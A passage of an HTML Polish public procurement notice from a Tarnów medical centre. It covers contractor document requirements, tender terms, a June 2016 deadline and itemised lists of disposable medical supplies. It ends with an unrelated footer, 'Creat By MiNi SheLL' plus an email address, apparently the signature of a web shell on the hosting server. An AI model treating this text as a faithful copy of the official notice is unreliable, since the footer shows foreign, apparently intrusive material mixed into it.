<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Wypełniony i podpisany formularz ofertowy załącznik nr 1 do SIWZ  wzór formularza
2.	Pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian umowy w następującym zakresie i na określonych poniżej warunkach 
Cena brutto będzie zmieniona wyłącznie w przypadku
a.zmiany stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto, cena netto pozostanie bez zmian
b. zmiany wymienione w pkt. a. następują z mocy prawa po wejściu w życie podstawy prawnej ich obowiązywania
c. w przypadku szczególnych okoliczności, takich jak wstrzymanie lub zakończenie produkcji, strony dopuszczają możliwość dostarczania odpowiedników materiałów objętych umową. Ewentualna zmiana ceny w tym zakresie może odbywać się na zasadach określonych w pkt. e.
d).w przypadku, kiedy strony nie dojdą do porozumienia w zakresie zmian cen wyrobów objętych umową dopuszczają możliwość rozwiązania umowy w całości lub w spornej części.
e. Wprowadzenie zmiany, o której mowa w ust. c. wymaga zgodnego porozumienia stron, potwierdzonego zawartym aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> mcm@mcm.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Mościckie Centrum Medyczne Sp. z o.o. w Tarnowie, 33-101 Tarnów, ul. Kwiatkowskiego 15, sekretariat p. 131.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2016 godzina 12:00, miejsce: Mościckie Centrum Medyczne Sp. z o.o. w Tarnowie, 33-101 Tarnów, ul. Kwiatkowskiego 15, sekretariat p. 131.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	NAZWA MATERIAŁU	J.M.	Ilość 
1	IGŁA  0,4X nie mniej niż 19mm i nie więcej niż 20 mm , a100 SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	Op.	5
2	IGŁA  0,5X25 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	20
3	IGŁA 0,6X30  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	10
4	IGŁA 0,7X40  A100SZT. Terumo pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	100
5	IGŁA O,8X40 A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	45
6	IGŁA 0,9X40  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	50
7	IGŁA1,1X40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	5
8	IGŁA 0,5X16  A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	2
9	IGŁA0,9X50   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	2
10	IGŁA 1,2X40   A100SZT. pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	OP.	35
11	IGŁA DO WSTRZYKIWACZY INSULINOWYCH JAŁOWE 0,30X8MM pełne oznaczenie i identyfikacja produktu, na każdym pojedynczym opakowaniu z igłą	SZT.	800
12	STRZYKAWKA  100ML JAŁOWA  NIEPIROGENNA do płukania uszu z łagodnym zakończeniem TYPU POLFA	SZT.	1800
13	STRZYKAWKA 2CZĘŚCIOWA  2ML A 100SZT 
 kontrastujący tłok
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa		OP.	65
14	STRZYKAWKA 2CZĘŚCIOWA  5ML A 100SZT  
kontrastujący tłok 
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa	OP.	50
15	STRZYKAWKA  2CZĘŚCIOWA  10ML A 100SZT 
kontrastujący tłok
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa	OP.	15
16	STRZYKAWKA  2CZĘŚCIOWA  20 ML.A 100SZ 
 kontrastujący tłok 
rozszerzona skala min.20proc.
pojedyncza skala pomiarowa	OP.	30
17	STRZYKAWKA do pompy infuzyjnej NIE MNIEJ NIŻ 50ML. I NIE WIĘCEJ NIŻ 60 ML.	SZT.	10
18	FARTUCH FLIZOLINOWY 1X UŻYTKU a 10 szt	Op .	20
19	Fartuch foliowy  a 100 szt.	Op.	30
20	PRZEŚCIERADŁO FLIZELINOWE 1X UŻYTKU NIE MNIEJSZE NIŻ 210X140 pakowane po 10szt.	Op.	60
21	MASECZKA 1XUŻYTKU FLIZELINOWA Z GUMKĄ a 50szt.	Op.	30
22	MOTYLKI 22G	SZT.	100
23	VENFLON 0,6 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	50
24	VENFLON 0,7 wykonany z poliuretanu, posiadający min. 3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	300
25	VENFLON 0,9 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	600
26	VENFLON 1,1 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu
	SZT.	300
27	VENFLON 1,3 wykonany z poliuretanu, posiadający min.3 paski widoczne w RTG, samodomykający się korek portu bocznego oraz filtr hydrofobowy. Korek może posiadać system zatrzaskowy typu klik oraz zawór ułatwiający wprowadzenie płynu i zapobiegający jego cofaniu się.
Nazwa handlowa lub producenta na pojedynczym opakowaniu	SZT.	200
28	KORECZEK DO VENFLONU może posiadać trzpień zamykający światło kaniuli znajdujące się powyżej krawędzi koreczka.	SZT.	1000
29	Zamknięty system dostępu naczyniowego bezigłowy, bez metalowych oraz wewnetrzynych mechanicznych części, bez lateksu, umożliwiający połączenia typu Luer zapewniający używanie do 7 dni.	Szt.	100
30	KRANIK TRÓJDROŻNY DO VENFLONU	SZT.	
31	ZATYCZKA DO CEWNIKA TYPU FOLLEY UNIWERSALNA POSIADAJĄCA  UCHWYT UŁATWIAJĄCY  PRAWIDŁOWE UMIESZCZENIE GO W ODPOWIEDNIM MIEJCSU	SZT.	100
32	PRZEDŁUŻACZ DO POMPY INFUZYJNEJ NIE KRÓTSZY NIŻ 120 CM JAŁOWY NIEPIROGENNY, NIETOKSYCZNY	SZT.	50
33	CEWNIK DO PODAWANIA TLENU PRZEZ NOS DLA DOROSŁYCH	SZT.	50
34	CEWNIK DO ODSYSANIA DLA DOROSŁYCH 	SZT.	1500
35	CEWNIK ZEWNĘTRZNY Urologiczny NR 25	SZT.	10
36	DREN DO MASKI TLENOWEJ	SZT.	10
37	KANKA DOODBYTNICZA DLA DOROS.NR 24	SZT.	50
38	ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS. CH 18 nie krótsze niż 800 mm	SZT.	50
39	ZGŁĘBNIK ŻOŁĄDKOWY DLA DOROS.CH 16	SZT.	20
40	CEWNIK TYPU FOLLEYA NR 06	SZT.	5
41	CEWNIK TYPU FOLLEYA NR 08	SZT.	5
42	CEWNIK TYPU FOLLEYA NR 10	SZT.	5
43	CEWNIK TYPU FOLLEYA NR 12	SZT.	5
44	CEWNIK TYPU FOLLEYA NR 16	SZT.	70
45	CEWNIK TYPU FOLLEYA NR 18	SZT.	80
46	CEWNIK TYPU FOLLEYA NR 20	SZT.	20
47	CEWNIK TYPU FOLLEYA NR 22	SZT.	50
48	CEWNIK TYPU FOLLEYA NR 24	SZT.	70
49	CEWNIK TYPU FOLLEYA NR 26	SZT.	40
50	CEWNIK TYPU FOLLEYA NR 30	SZT.	20
51	KAPTUREK JEDNORAZOWY PLASTIKOWY DO TERMOMETRU Brown a 40 szt.	Op.	12
52	WOREK UROLOGICZNY 2L. jałowy	SZT.	500
53	WOREK UROLOGICZNY 750 ML. jałowy	SZT.	10
54	KIELISZKI JEDNORAZOWE NA LEKI a 75 szt.	OP.	150
55	Wziernik do otoskopu Heine Mini 3000 jednorazowy plastikowy  4 mm	SZT.	2000
56	Wziernik do otoskopu Heine Mini 3000 jednorazowy plastikowy  2,5 mm	SZT.	2000
57	PASKI DO STER.PARĄ WODNĄ DO PAKIETU  V klasy a100szt.	OP.	200
58	TAŚMA DO STER.PARĄ WODNĄ NA PAKIET a 1szt.	OP.	4
59	TOREB.PAPIER.FOLIA SAMOP.90x230a100szt.	OP.	3
60	TOREB.PAPIER.FOLIA SAMOP. 90x203a100szt.	OP.	3
61	TOREB.PAPIER.FOLIA SAMOP.130x250 a100szt.	OP.	3
62	TOREB.PAPIER.FOLIA SAMOP.90x130 a100szt.	OP.	3
63	SZPATUŁKI  DO JĘZYKA drewniane A 100SZT.	OP.	100
64	PENSETY JEDNORAZ. jałowa	SZT.	120
65	KUBKI NA MOCZ JAŁOWE nie mniej niż 100ML.Z ZAKRETKĄ	SZT.	300
66	APARAT DO KROPÓWKI posiadające komorę wolną od PCV oraz pozbawione ftalanów	SZT.	2000
67	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 11	SZT.	20
68	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 12	SZT.	20
69	SCALPEL JAŁOWY OSTRZE + UCHWYT NR 13	SZT	20
70	OSTRZA STERYLNE WYMIENNE NR. 24 nie wymagany grawer z nazwą producenta na ostrzu 	OP.	2
71	OSTRZA STERYLNE WYMIENNE NR. 13 nie wymagany grawer z nazwą producenta na ostrzu	OP.	2
72	OSTRZA STERYLNE WYMIENNE NR. 23 nie wymagany grawer z nazwą producenta na ostrzu	OP.	2
73	OSTRZA STERYLNE WYMIENNE NR. 12 Z ZAKRZWIONYM OSTRZEM nie wymagany grawer z nazwą producenta na ostrzu	OP.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> l.p.	NAZWA ASORTYMENTU	J.M.	Ilość 
1	Rękawice lateksowe diagnostyczne , pudrowe XS przeznaczone dla minimum średniego zagrożenia a 100 szt.   	OP.	10
2	Rękawice lateksowe, diagnostyczne, pudrowane S  przeznaczone dla minimum średniego zagrożenia a100 szt.	Op.	40
3	Rękawiczki lateksowe diagnostyczne, pudrowane  M przeznaczone dla minimum średniego zagrożenia a100 szt.	Op.	150
4	Rękawiczki lateksowe diagnostyczne, pudrowane L przeznaczone dla minimum średniego zagrożenia a100 szt.	Op.	180
5	Rękawice winylowe bezpudrowe S a100 szt. przeznaczone dla minimum średniego zagrożenia	OP.	80
6	Rękawice winylowe bezpudrowe M przeznaczone dla minimum średniego zagrożenia a100szt.	OP.	500
7	Rękawice winylowe bezpudrowe L przeznaczone dla minimum średniego zagrożenia a100szt.	OP.	150 
8	Rękawiczki pudrowane , lateksowe, chirurgiczne jałowe nr 8 pakowane po 2 szt.	PAR	200
9	Rękawiczki pudrowane , lateksowe, chirurgiczne jałowe sterylne 7,5 pakowane po 2 szt.	PAR.	2
10	Rękawice pudrowane , lateksowe, chirurgiczne jałowe sterylne 6,5 pakowane po 2 szt.	PAR.	100
11	Rękawiczki nitrylowe S - bezpudrowe, diagnostyczne a 100szt.	OP.	230
12	Rękawiczki nitrylowe M - bezpudrowe, diagnostyczne a 100szt.	OP.	870
13	Rękawiczki nitrylowe L - bezpudrowe, diagnostyczne a100szt.	OP.	270.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NAZWA MATERIAŁU	J.M	Ilość 
1	POJEMN. NA ODP.MED. 10 L. PLASTIK	SZT.	150
2	POJEMN.NA ODP. MED.20L. PLASTIK	SZT.	20
3	POJEMN.NA ODP.MED.5L.PLASTIK	SZT.	150
4	POJEMN.NA ODP.MD.3,5L.PLASTIK	SZT.	70
5	POJEMN.NA ODP.MED. 2 L.PLASTIK o wysokości nie mniej niż 20 cm i nie więcej niż 23 cm	SZT.	150
6	POJEMN.NA ODP.MED. 2 L.PLASTIK o wysokości nie mniej niż 14 cm i nie więcej niż 16 cm.		300
7	POJEMN.NA ODP.MED. 1 L.PLASTIK	SZT.	50
8	POJEMN.NA ODP.MED. 0,7 L. PLASTIK	SZT.	30
9	POJEMN.NA ODP.MED 0,2 l. PLASTIK	SZT.	10
10	PUDEŁKA NA ODPADY 4L. TEKTURA	SZT.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> DOSTAWA MATERIAŁÓW MEDYCZNYCH I SPRZĘTY JEDNORAZOWEGO UŻYTKU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Materiały diagnostyczne	j.m.	ilość
1	SZKIEŁKA NAKRYWKOWE 24X50 MM TYPU MENZEL a 100 SZT.	OP.	20
2	SZKIEŁKA PODSTAWOWE Z BIAŁYM POLEM TYPU MENZEL a50SZT.	OP.	25
3	ŻEL DO USG A 500ML.	SZT	100
4	ŻEL DO USG NIE GORSZY NIŻ SONOGEL A 5l z pompką do aparatu LOGIQ 5 Expert	szt..	8
5	PAPIER DO EKG A-4 112X25 Z NADRUKIEM do aparatu ASCARD	ROL	130
6	PAPIER DO EKG A-3 104X40 Z NADRUKIEM do aparatu ASCARD	ROL	20
7	WZIERNIKI GINEKOLOGICZNE XS 	SZT.	500
8	WZIERNIKI GINEKOL. S TYPU CUSCO	Szt.	800
9	SZCZOTECZKA DO WYM.CYTOLOG.A 100SZT okrągła jałowa	OP.	10
10	SZCZOTECZKA DO WYM.CYTOLOG.A 100SZT wachlarz jałowa 	OP.	2
11	PAT.DO POB. WYM.CYTOLOGICZNYCH .A 100 SZT. PLASTIKOWE JAŁOWE Z WACIKIEM nie krótsze niż 210mm.	OP.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com